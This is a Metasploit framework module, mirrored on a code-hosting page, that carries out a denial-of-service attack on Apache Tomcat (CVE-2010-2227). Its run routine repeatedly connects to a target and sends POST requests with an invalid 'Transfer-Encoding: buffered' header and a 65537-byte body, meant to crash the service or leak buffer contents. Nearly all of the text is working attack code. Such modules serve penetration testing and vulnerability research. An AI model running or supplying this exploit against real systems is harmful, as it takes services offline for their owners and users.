Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',
15
'Description' => %q{
16
Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not
17
properly handle an invalid Transfer-Encoding header, which allows remote attackers
18
to cause a denial of service (application outage) or obtain sensitive information
19
via a crafted header that interferes with "recycling of a buffer."
20
},
21
'Author' => [
22
'Steve Jones', # original discoverer
23
'Hoagie <andi[at]void.at>', # original public exploit
24
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
25
],
26
'License' => MSF_LICENSE,
27
'References' => [
28
[ 'CVE', '2010-2227' ],
29
[ 'OSVDB', '66319' ],
30
[ 'BID', '41544' ]
31
],
32
'DisclosureDate' => '2010-07-09',
33
'Notes' => {
34
'Stability' => [CRASH_SERVICE_DOWN],
35
'SideEffects' => [],
36
'Reliability' => []
37
}
38
)
39
)
40
41
register_options(
42
[
43
Opt::RPORT(8000),
44
OptInt.new('RLIMIT', [ true, 'Number of requests to send', 25])
45
]
46
)
47
end
48
49
def run
50
for x in 1..datastore['RLIMIT']
51
begin
52
connect
53
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
54
55
sploit = "POST / HTTP/1.1\r\n"
56
sploit << 'Host: ' + rhost + "\r\n"
57
sploit << "Transfer-Encoding: buffered\r\n"
58
sploit << "Content-Length: 65537\r\n\r\n"
59
sploit << Rex::Text.rand_text_alpha(1) * 65537
60
61
sock.put(sploit + "\r\n\r\n")
62
disconnect
63
64
print_error('DoS packet unsuccessful')
65
rescue ::Rex::ConnectionRefused
66
print_error("Unable to connect to #{rhost}:#{rport}")
67
rescue ::Errno::ECONNRESET
68
print_good("DoS packet successful. #{rhost} not responding.")
69
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
70
print_error("Couldn't connect to #{rhost}:#{rport}")
71
rescue ::Timeout::Error, ::Errno::EPIPE => e
72
vprint_error(e.message)
73
end
74
end
75
end
76
end
77
78